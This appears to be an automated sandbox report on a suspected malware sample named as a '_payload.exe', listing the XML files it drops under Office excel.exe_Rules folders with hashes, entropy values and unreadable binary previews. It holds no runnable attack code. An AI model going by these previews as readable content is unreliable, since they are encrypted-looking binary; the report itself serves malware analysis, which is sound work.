                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):999
                                                                                                                          Entropy (8bit):7.76637915113685
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:vOOe/c+4HPB5ZqbKWVmn+YjTz4dIbn7FI3wR17/mUbD:V+kB5ZSKxZ7F3R1lD
                                                                                                                          MD5:AC3FF916896D3725D2E42881D37D9E04
                                                                                                                          SHA1:0996AFD652920AE76C70BCA861A85E90E2D7D5F0
                                                                                                                          SHA-256:41A1E2D61BB7FD83F43853956F0AAEAF4BDE0E4E1B032BDFE599192F98AA5C67
                                                                                                                          SHA-512:3FF0A237E572A861F5326E9FC5B437061ED4F8FBE5784A67E0342A6854E0D577BC996E775C3E533750A3FFFB290848032FDC4F6D26ECA59557874EDD9015BBDF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.X.!. )..k.)..|.....p...sX..M$....,..EeB...U.I,...n.....r...I.=.D......).5.&T..PTS.VS....S.1`......i@.....5H.................S b(.WmV.n...j+...+.|...5U...l...JX.*....w.....u.f%..\E...dF....?.;8...e.X..;.j%.j.9)!....M.......|.W...d.....F...........V.4.f._..... .]I{..........@..'K*...h.-..J...[.`..s....;.....`[.L.m.t.6.K.uHb..u.......[..g~..k.^.En~.w..$.4..!.sM..e0o...n.Dy.=..j4e.._..<.p.V..S|.(@.@.K..R..3G....7.-.\.j...9@fg2..z..~9!t..4...............*/ ..L..K..........;.'.......*..".S....D. 7.Hc..%...vs....M.!......`...C|.p2...o.!,./.......!%...*..H...&....S.1.R..f.KM.@..Z.J..P.....z.N.*"v..'..=./.;.dH.#NofiHM..!...-...2.v...Fc..A.=...oK"..\.c...M_M&V.2..L..8..=.f.....n..@"...CvX.....!1. .U`.64:+w..O.7.{RY.......k.9..s.c...>&.O..*.&.z.[..8s>.!..{.U............(P0.Nj.{...../.z...S..&..........`^.nl...n...s\..u.6R}.t....d...s{..R.P..M...l!.h..S..V.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4446
                                                                                                                          Entropy (8bit):7.960477409292028
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:ftMjOXmQkD+bP/yvmyxNGLViKOFH0GpSHeN06X6mmFPZXc8dTqDMIwQuH:1MjGfOcCHLQiV+eWImFPZM8d2DMbH
                                                                                                                          MD5:D7F050D7A2EBFAD1F8D2AC4FB95657A0
                                                                                                                          SHA1:4D41B643F6F7943D9DF40043710016D3F4DE74CB
                                                                                                                          SHA-256:883CC435B00B0E5C763A8937C8A3964AC3167CC2CEB391D8B9A53C4F6F1A542C
                                                                                                                          SHA-512:60A11C62A2B8BB9A2D6B74CBC72E79C7BE32DA0393176D9BC9D0346805ECC706816A29525C436C376A43CA7DA964957EAE80FF66C29D777C585775A3D3441B07
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..9.D.t.h.ko6.......+U...j2....Z1...m.AL4....vr.':w....Y.^c_.l_....5.......y.....<;..e1R....r...)&...kIL....~..cD.R...S.E..-3(..;.y....F.....;...}..(...l...w.em...W....?.m....W...h.a...4.s....=[.53..O....an2..c.X...r.[o.`..6.ky.-.4..~.?N.......Cx.}.w~..3.......>...'.<;HL.j......3..f......J......$....S-..~..`..I...g......c...9.0....}.&|....w...w]..[G......."^_=u..4.b....1..<1._&N,..E.$84.a..H............3.. .~..7..;..`..:Ub..vJ.\...h.`..*.g...*...#_...\e......{.R.....e...O7.T.i..3... ..!T....%....%..T".n..{...~t6.f.....F%.%.......&......6...k.n..H.....Z..3.97w.... .L..@p9E1]i....G.K..N..C.@. 5>G4...r..g..B.V{....{|<....u./.X.A.....K..A..;`.h..'.....yK....,.)L.i.)...2w.....I.>....\Y.j.....[..1E..j...o.+....SR{.Q.C"..T.WxR.......k.....1);....[d..p$.6.\.g .....j...M,....1.2..;.......R.1.-BC.......M..3.+V|..I..&.X....%tkSGP0U.}.{0s....C...8].../../`t.|v...n8..~....?C...+..M...e.x[.p..G.d.*2.X^..t...z....p..]@..(......Z.g_...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2306
                                                                                                                          Entropy (8bit):7.907899200537934
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YCPPfsTjOxMtXmaGAmywLfveslDASPwxC5y3DvzDc33ziD:YQKMAmyG7ASPwxC5y7cTq
                                                                                                                          MD5:892F57FA4568FDE039388ABA16C3FDF1
                                                                                                                          SHA1:58CB6B2DBA2D83F08396D5579AD53A529654263A
                                                                                                                          SHA-256:0EF8A06C303F0EBA3EED3F7D37088A414A8C5D6131B1BA5FAF2C16A92473937B
                                                                                                                          SHA-512:FDDFE6D930ECF8F40DBD98A8FCC2278425220EF9B9DF44D5C619F04A98893A4DB516057113ED1005E7E91B96D56725415BB3C8A0A05020D042A6CDD756EF3F98
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....|.:v..v.jr.T_H...s...Z/.*.S|Y.....n.g..{t.Rk....#..c..~.P3#.J..M....ds..O.x0....|.>S|.r.u#5e.w..K......tI.-GJ.......G..w.h+>.l#..8..*.;...EN....\..;O.Nf..[_.t..^..Kp.t......1;..w{.9z.y..T...43{`M1...IE..D(...K...U.....S.50f.ZC.&.V0.9H.t..j.Y.....F...n~..v...bj..%=o..j.k....M..A...h...HU...p.......i..-....,.\..../.*...%..0..~..It.A.f...Pr=..e...W.T....5..X.U......5.y....u...=.S..@}..@r...|...I_.4L....Y....EK...ago.vQ3...c._;.I...C...]d.=..m....]Eun..T.P...2...*,......p..3.Q...7*..."C(.?.~ o......]b...[.........M...%E*...m..X&..ipPT......:.8k.........MO.J...HkB...N..U)..i..-....|.....V.7|......n...V...]32`.t.g.I.[.<L.e.pq.Z3........Jq.Aj......{:.P.....(.b5.."].f..)...Q..t.B.7.*...18g.i....Y....,.!..._..J...a4..z.eV..?u.x.D..m.1R.!.......c.8}.....a...'.}.D..{.(.z?..?....~2....0...98X'!......../\+.`I..f'.v..P......xq...'..aW...3.V......R......>....G..1s....'...h.jkn..DP....7.^QdB:...hS....4l..<.BoQ....,~.....m...HlWg........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241002v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2376
                                                                                                                          Entropy (8bit):7.909509555290092
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iwB4x6Y5wKI+h+glhjlbXhkglVF05/98rW2HUUdQydIMxx3661IMx4io9m8D:v86vvhGhjlb28Oh9yW2HUiho61IMx4iy
                                                                                                                          MD5:507326F5588793A7312A76CA86048485
                                                                                                                          SHA1:4641CECA9EF07167EA59DE615E4A22E2D7A24362
                                                                                                                          SHA-256:54CA69AEFD630EC18F8D72B667801158A0C9E53DA5D57DE3E4EDEDAE6ECF6BCB
                                                                                                                          SHA-512:C02EBD5E4F39D7A1B67A3A7168A353B50ECE94F5F0DB29F0DBCF4A0B471C0B900F75EADA4F95C1976164F2C8A26872FDD540748762F9AFEB2F8D9CE3530BF009
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Dn<..y......nN.!H...%iz9....u.n..(;vk.E.d.....ym...?.10.u...)...l..}.8Y..x.(J.e.R...-`..Y......71.......c..Q..H.*...5.j3....e....0....~..U.......D.i..S....W.D..dZj.......K;....^w..v. ..p..8......;...]....d.x.Mk.7........,...+b.T_.I4.8q.[..R.(..u.c.....J..b....S../:...._...s...%..*..2-N.0K:......-.7.......qM......o...........U.........`e6....DN.1.......L.tm..FG%.N+T....osj.VX5|....h5.W.%.]n[.K...~6.....F....,{.Dk.c.......QI....n.......I.=.T...........c..:.T..`5......'..O.e..z.._..\..6u#.......o.p.e...{f....%...;.r8?o%.|ljS$J7.D.....'.N<.k.e2.N....M2...s..ieP.~.....I.E...`Y.9..t...D..$3W.......@.l.....T.nh...4.\...*^...ZvA?...&0S:..N8.......Tm....u..._ ..9H..q...~.6...x...J..~..4k.y.y.h...N...B..Z...t..E.t..e...r|Q.rLh.vK...$.S.Pf.w..x.[2V.1....L...BMN.9J..-....>..~M.U6...?.s.:#.G.;...........D..9.m_....X....u.;.Y.4........$........^......+....t...~.&........M......=>....%J.,...u.=sqZA}L.#......6.IB8.......Ko..Y.?..hcwL5.........^.Z.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1043
                                                                                                                          Entropy (8bit):7.802607818495457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:u9CYpwY0wFepkj+eZryrwE9Gcevn+fyhPY5uh5+bD:NOwZlKR1uj9GcevnjX8D
                                                                                                                          MD5:27221625D3EE25C552113FE579D4A896
                                                                                                                          SHA1:74C62EF2F4C85762EAF0A3B65EB4D908B4530325
                                                                                                                          SHA-256:B9EF623D311D8ABC6BEC8872AB255B9817DAFD8FE94D170D61BD698755AEE81C
                                                                                                                          SHA-512:D0D74820E185B6EB9360836B8768F664FCB1D6ABC781C2941DA3E66A4402D31A3A02BF078C4915877170A74E177FBC56BDBDF7B38F42FC8F786A14EA03510900
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........u}V+..;.,...@..?.uA.h.M..3..w..O....r........3.*.^......n}.@.....3....Tk[=C.:....*...j.#...2..U..D.m..0.!..VB..n.!..u....].<%.w...s.JN>.hl..R..E.a.X.P.D.=oW...a.U0..%a.My...I.!c.....,.K[M......7.}.................8-..H\...[?../...>.P.s..z....6....Q%w.x.8s."{...q_._.).o.N....(...%.}#z..\.Y&b.j....8..J....&....jM.....a......MR.G......N.F..... .,..+.O.t>..^..+8Z.R.+..r.:.......K../.8..C..uXm.......D8..../.6.!*.KE..Ja....5O.)......ivE..q|.\.~h?...mdm..++....lHo.~.._.*....{f1.nq..F.HG....!..u.~?%^..3...,0[...*8..CV..i.j.j.....Q...4./..o\.U..W....KD2s._.uQ$.|.1~E.|Z".o.D.v.bQ.. ..{Jz.=6..b....-o......9|.8..w.D.%K W..%.k|:.)..s..h....F.C..!.~n..:4O......*.....&VP)...k.....5......:.v&..771=.!.P..t..@.(..Du..[...X#..}.K|..;.+.!w...Ca...E3A..!...........v}...A..2..Z%....H........Ga=!.r......F...j1.>.F..E..:SgB<....V..Be"s;....R......IO.K...;U.l.>..i...%a...`..'~Kg>..A.Y.. ...(.......|.Y.ph.p.phJtdHo970vyx7vwlYG00OakDR75RuJz7NX

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270001v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):961
                                                                                                                          Entropy (8bit):7.784785686274732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:osojvfoixh3qlbi1Nzt8kYRn4RA69Rm/xECMS8KCqlYHaB7mRh8Ap/kcfbti5zny:anxJqJizhDRVbGZjKHmKRhPdfbQd9GbD
                                                                                                                          MD5:FED6D198A0BE2343E3E722D480111AF5
                                                                                                                          SHA1:C7D7F894F4D8A9D27B281D4C549ED6D12140EDBA
                                                                                                                          SHA-256:4DF9C7D501265C403FAC15D828679369C58F595E2DC3727B4A95139CE9955757
                                                                                                                          SHA-512:C76C0A6EE556B0721D5C2AE69765935AC35742C7B351CF999E7C64E76107247D21DF10FE1EF150D42A905663C58F8A041BEAA7DFC2F9242624B3046932B1BCAF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.........4[..._.[.hQ....P.r.q0...L..O....jc...m...~UlX..Y....=....d-..C...OG..)z9..)..s..).b..6.....?..l.21....|...z.U.V..[...50....X*f..8...a.t.k..$.E*..-...[~..w.x...%.........y...HU...0.c.V...p.......A0]..D#f.f.'./E,|..5.........n.e......,4..ZV-.....=h.S1$x.....Q....=...[....+.C....a......;.ZO.. ..x.."i..v.....w...PD..*q.a.E....B_........j...x.....8p...O.=w...?...2.&C.........C........T.P|Fg.e..H..(}..&..g@.CT..$...O.+p<P$A..*^l...4)..../........U. S....R.g6T..K,o...dA..=...n.sm.l:..t....l...bF.ql]..e.2X..fw.....Tq.h2.E....(G]..,.=..>.Jt6U+[....V.,.Vg.5.-VW3n..M..........eB(.T_.ft.LQ.....F..5......?D..I.:...z.lw.nT.lH..c.=.\L..v....X.A|....d`....!...db:.Bo....A.U.../S..m.3=Q....PJ...dq.{.7@)....._...`..KDpG.......V#.v...~Y....]c..~.....a.-......-..i...b.....M....#.u..i.7.B..S.8.v1.6q.T.p.c.OWK..7x.T+.[.k]...wd.0...N...i.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270002v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1126
                                                                                                                          Entropy (8bit):7.809607661601768
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4zWSUprWd4Ceq9eqVHWle4nmcbR7DNL6rB45wAc4e3UbD:DSSd+eqV2c2mcxDNL6V45wP2D
                                                                                                                          MD5:D889F2CBAA21A468D2BB16C02F1DDFE4
                                                                                                                          SHA1:B2DD3C20056BDA145C4EDFA3B5ECB8C92A428956
                                                                                                                          SHA-256:8C97AF403174541092A351259184C9F947BE689DD53BCA7EFD8C72108AF964C6
                                                                                                                          SHA-512:7D1C18153DB1654DC1A7F04B1C4EE4880F093948A829D678F3D49941F3B5792F2D70FB51D96DE188D9B35ABEE7DA4BCAF96D8F923718613D526DA0B5CC9A1A77
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml".+..T>Ln\..w.4....[;.6.+..|R"'..7..%{.........e.u..6.h|.4..vt.'....b7..Tk...4y.Z.l..Q-P..vf.oA....n....y.Zr.$..D.~Q....A.A&\-....~..q=9h4..x..............f..9...i.G...q..IF9U....W:.h.;....*5.....~yJ..R..,,.x.i..V..d...~.....Xv.('n.w.Z.o*.x..3.....G~......-..>....k..p&^..I.....'.........\.'....D.....e....K.5.q.6.|SIe...W.sW..k.I4....*`F....;Fs.j..7.K..<q.. ..D....,...y4..b.....S..r.b....r%.......Z.e..x...7.A./T.U.no....N....w.w."..........>.DT..$.x.v..N.u....j.Dq....JlA.W.f-..A..i..O&)........hD6....(.......U...~.3..N^....?w...`....U....y..+s!.......f......^.m+. r.5...sx..;Dz.X\w..`........ ..!...@....d..8...h#1.}q..E2.#a....q#.g.KRt(*..3...|.0..Ml..kO..0.4..].eW2.....j.%G...<.(.u....Y.&.......'..D...8.$C.......S.U..9.r...kw.......,;..j...9.m .....h.&...>.o...E.....u..l.D.U..9......vSQ.p........F.O.2....w.0.<.Kt.-.1Jz.i.B./......A...@..._.}..G..l.KQ.sX>\.R....+f(...__r.H........M...Q......G@..P.4.?...cOL..N`R.....Z.m.?.w"Sm

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270003v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1662
                                                                                                                          Entropy (8bit):7.876043202130754
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:qAi7FTXU5mknIQRYM8YhbA4J3qs38lOcDBQUjDQzoLtjsOGQUniBzjXyRB5qxbD:+7pE5mknlb8Yj3D3WVDB5AKt2il8SD
                                                                                                                          MD5:16C8C469601E84F8F9C91F09479E1B84
                                                                                                                          SHA1:C0D66A6216F63672346887BCC80070C2AD0FEC5D
                                                                                                                          SHA-256:D59504080314DDEE7CD98CDFBF3C258F961A72A29C7918D4EECEAABA7F75C0E0
                                                                                                                          SHA-512:9849E376AD048A67DA7454416E89D8C8DA73101C2022FF841064103B065CBDED56E075B6170C32064F9ACC22E7D03999894B737BF5C06D4A1534DB49D08B21A0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....%........N..T.Lm7.XP..Low.!..s./.X0^.%.wB..]... .?.&.....<{-Yl.6@k..?lT..e..&... . ..U...-.h.@..Ko......MX..:.C.:.d..>.d.....f~..ui>....O../m.i.....^wp... W...>C.e...r.g.Vm...C..B...I..y......~..Sc.x.....&.6......1..).n...L.[..:......9.......0..z=5.s.....Wcz...&c.....c(....9GWA9..2gL*.R.a..t:.0U7...N...............lT....1p......z.A.n..Bm.5D..h%P.Q.....Rr.L...pI...>.E..=e..iR.o.-u..<..S../Rt.N.0@.6:A......>....}........ .......M..6}U.....;t..8.`.Yl.`....}&Ak...Y...{N;....U.o1.9..a..p.....2(c...Sn.....DT..U..m..}"^..q+.m+..P.....%YX.d..k... ........TQ.....H....+g...?.....G..k...$...'B........$.5V=..9W.....R.2.%.u#d.H...n^.Um.o.(....=.h.$.H..)../.K.GJ.a..<.[..@..p....Hq[..._\l..;.6..)#p.....$G...b..Z.L).'..v..0.7.eS$;..D2..CU....Q..n...U.'l.......\r z.+.........3.c.d...GqY....P.f.UY'....?D.Em..IAE.jX..=....&..C..c.{BC.A....#..W.H.......}..u......b..#....Vk_M.8.I.....&.<..~Z..Fql...,..|<G?%....5wE....r.rw.e<5IFT.j..~.|G.n.LJ.1Z..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270004v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):831
                                                                                                                          Entropy (8bit):7.757070894518447
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0vYXUgZyKNAC5ZcppzVcFH5v2b+TY/KGEOcNbW+4rbD:QIXQUrcjGFHxT+KGERxW+4PD
                                                                                                                          MD5:299E08746204C06F812098C22B9F455E
                                                                                                                          SHA1:6036439C34AEE131E36E2E216D298D886DEB2135
                                                                                                                          SHA-256:8EB4B9BB91C0B41CEA096927B3A715E7233BEBA9DEEB200C5512F930376F78D9
                                                                                                                          SHA-512:E54FCFE2BAD6B74E31EBDD5CF551371CE9C8BE53435EF1C5410BAF7511154D20323E5A16B08AA8B76DE33B4414B994AEFDEC7A374F35FFBE1707A2953D7390EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlN..RrOjS7..C<l.R!"..@W..H..r.dQ...Z.?6.g7.^|...8...w]8....k..5..._..|cr.x. .#PN..`....].<.zQNf4.".....N.'.U.ZI.u.z..L..Y.....K.I.e...).....T4.$..>;.b.S6...dM6..{9.l. ..g.;.F;....u..fl.{...((.n.x...D0.....P.B.g.\...b.>.2.I#.....k.t..g.d...m...1e..k..:.N..xQ.... ..:.].V.W.y..,..C.0....W..GO].O...A...C.........&..y...|.J.F..o.{T.[sO.l=....TK.<F.k....J......W....s......^v..m..:9m..:..a-.(aKF...u}9..m...8*.'.>oO.Z.%..v;z..S.b.......hJ.R|6.1.nd.N.......a[C.,%R...=..........yvB*t.U.?.....qXd....).)....F......r.D^3..E\.+.}.k...&.}z..W;..;.......7...../.aV..>X.tn......<.-.o.Yi.\.........e...A.t..6p.9.F...k%....:[..<...T..yg....6...j..P.U$.A.$.Z...Fa`=....~...J...h....... N...}......I........N.....d.'?.uphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270005v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1485
                                                                                                                          Entropy (8bit):7.860039774255592
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:7ayCSzSVZ70Mcln5Ouf6xc38dYL4SIM1kWtylylhK32la5/qpGtJ74UIOHB6bD:lzzSVZYBbf6x3dynSWt0ya32E/ZlHB4D
                                                                                                                          MD5:65B6ED08BDDFB7AC2BD0DBD4B9BE22ED
                                                                                                                          SHA1:E10D9BA6D3721E42D6FB14B572F75E65F33A7D5E
                                                                                                                          SHA-256:F941EAA1F92A154A8709980B928A5E881374E54AC9AFCF43B3AB4ADFCC852DF8
                                                                                                                          SHA-512:1939C502CB3B4AA97617D8005EC5BB789A98E8AEF02D8E8826D5B58B81B242E1BAA9A383ADCDEF543B39F9345E8F95C123BAB5482A404EEF1D5803449ACB2250
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlo]..s.4H.|.H..`.....8K.......o..p8.ac..~>M^i.l...8...n.\....,,.d..].%..|...'.DF>[GT.....J...G....I...k.&T..,a8.E.w..t...q/<|'.?.,...@]@..}.W.~oZaD....t.3...h.c?c.[<.A.#j..O..UG.....r;.'.^.e..t.........6,F>.?.. .....oZ$...@Q...m1*.W...x7...tG.`.. ^...wG..n....!n_0.@......Y...P..E..U.)y -.h.,%.>W.9f..+..|...ou...u.........._'..$..$Ek.fF...Dw.Z.[..C3%9..B.Y..3W..;..Z.3.......8.?&.Q.Vu........K...`.w0..[.......K....\^. .$r......LC..DK.T../;.7..-...&.g..)7.[.Nf.@.G.:.3J......e./....B.*).....}..M.5..Z.A.....1o...Jg(e..t.i...3.b*....NP.f........%iuP.0.....O...L.....}.E{\.2.b.L.,.1.t..%.+.....E..^wVCU..'#.N...[x.PH..o..3M.8W..d..f..1...Y.G.a...v.A..W...-m?....6. -\.u....3....E.....W..7..V.M...v$XbAu..2..2..5@3J......$f..F..@h]..#..j.s.....W.U1. 1I_-...v.?....n..<....K......O^..'c0Q.V%n.:...X..k.....v...0G.fcK.E..kp.P...+B..o..h.fC.LT3|4...........p......h...G..at^....p..Z........h.s-..-...0.E...*......>.6<"...<..t.^ ^.u.._.)!.X;...:...sf):...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270006v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2088
                                                                                                                          Entropy (8bit):7.894519000448064
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6QkVCLCO5Lw59ZO4TGmYG1mPdbND2GEYyz9NeHMiavNlPNm2D:67V8CZ4Gmu1YyBcsdvDlf
                                                                                                                          MD5:553927754AE2FA3D8EF14796A7F02F20
                                                                                                                          SHA1:55B5C1C4FD925071FA356B1BF8F0DE1AA7A496AE
                                                                                                                          SHA-256:58624F2D5034F4E35E2EEE308FC909DCD2DB2DAF8873C38CDE0229DF113498C6
                                                                                                                          SHA-512:E334DA888AE0B41359638DBD249FF27B9D20402AE7E6CB0B7BF5A10A69D0F06FC49B9B6759BA260C2AFC3736E7723BCB11EBFA165850D80933486A25AE6047EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......o.W..%.(.K.5mM.7...H ./.-...B.r.Z."..y........a(.....V7.S...f.gk.D..%......B.U...!...-s/....g..z.i.4b?[.;.%.\.....~.p.y?6..o>KM.B..1..B..=...TB....9^..!.....X.".|W...D..|.?'._De...E(l.A..UD3.k....(..!].....e..B.Y...;..@w....:o....X.O.......^.9W..A...'....0...........4O.y!....(a9)...v..kN.2.]..(...r;.)..X..).....&w..{./1..R@....b..R...jH4...\........t.[..F..YxT.....e...5..?....>i....R*.m+.c'T.....aQ.L.).H..*...0..l.&..J.2.....D.f..+_.3.......i..........VC.Z#.=Z4#.#.].......;%..K.3..K.y..6.B&..r...lT.l._6`LL.4j.....j....Y.~..S.^I..A.)..-.i.......-O..C......1.I ....duo.2.CJ...H.$m....,B..T....K>M.`..j.1c..Em...7l.fQg........9.1.I.V.3..n...]..s4ud..V.v..6.$.J..i...l-U.d.;...Zl..((n.X.?.wk..Ql..0...=....G&,r...z../Z.Fi.BYX..2.i.>m.-..n;I!...Yw.0.G...^.knLK.qi.o..D.0....#!C.@.H...C...>...,_N3.........@k....)V..2.@....U1.[.....2[@...+..t:..3.D.tJW_....Y.yX..U.[j.h...]..o..}N.1Q.q.P...1Q.S....j..i....._...W(..B10..L.......R...y._z.- 3.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270007v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):761
                                                                                                                          Entropy (8bit):7.730042114757932
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:nKnrQATLArMD0u9dhS+fjJ5tH0NTBcbYn7RuPifAo4bcUqSN5zq5bTcii9a:nGQ28rM9aWjJ51wTBvRuPwAp4y5GbD
                                                                                                                          MD5:A4F6E0022139B48D5156421EB3517A28
                                                                                                                          SHA1:3CAA1EF72EB7F8604BB76C3B91AABA80AA5F86EF
                                                                                                                          SHA-256:97131301EE8B63B301AE2A4421822845A01CEA44DE77A5BB9E701004A8DA3702
                                                                                                                          SHA-512:240A0DA326AB165506068AF5B2BCF3ABEC577E4C909671B5859F70862E950E13D35032778E4FE78425F08909E59606FE400ADE131E043BD6011BC065873419D2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.&9AN.h..pn....L'V.S..{#>....$.X.H..........mA.....U.......V....L...-.]. c..........S.R..*Z...Oc.0......5:....g.2[...o..._..z...\z. v)6.L0......-m..oj......T.f..s....t..>....y.<og.k.../..@. 7TC..K-W....<.x........7..o........@...0.l..lIQ..Lo~......;..b.N\...#..(I.?E....b..+..n^yB......(v.0..T...U.....E.A...T<..>}..M.unKNvY.G.....I*(6@.KMU....`.(..6_}.A..t.......M....=..........,..:...u. ..o#m/&$..k>*......-.w.Zo...\?..?..I..yF.}.L..ij.0.cv...S........ mh]...H.EY..N.fR..m./.l9X!..^#(gm..$Ai...Y.D_<..wjj.z..E..cr..p..y...(.....G......T).....]........:..M.l.hQh..is..8..P.z.M~..wt.%}....y...6..P.B.TCF.dh.......Qc#G...%6F|1?M.k"G#....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270009v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):854
                                                                                                                          Entropy (8bit):7.726058733293437
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3QayCgqOpxGTVKsQxbQ5kXUFrmEI3qo+GsbD:3LwxGTIsKQ5wUlmJmD
                                                                                                                          MD5:12F1E8379A685D673DC5C2EB41A94F3B
                                                                                                                          SHA1:CD85F573EA88A87D8EB60F7FC32CBF7C95DD844B
                                                                                                                          SHA-256:C706B8DEF211499E263A32D660C668F9AF8F1D170C142EB0643E7AE52B08E562
                                                                                                                          SHA-512:9C9E0C41E201AB2AC0A8215B2F333F4047BBC601D2CE5710F466F4689BC9D8142801B169B672A85731088E3A4979405E9582E05ABEDEA48F441882A6350B49D8
                                                                                                                          Malicious:false
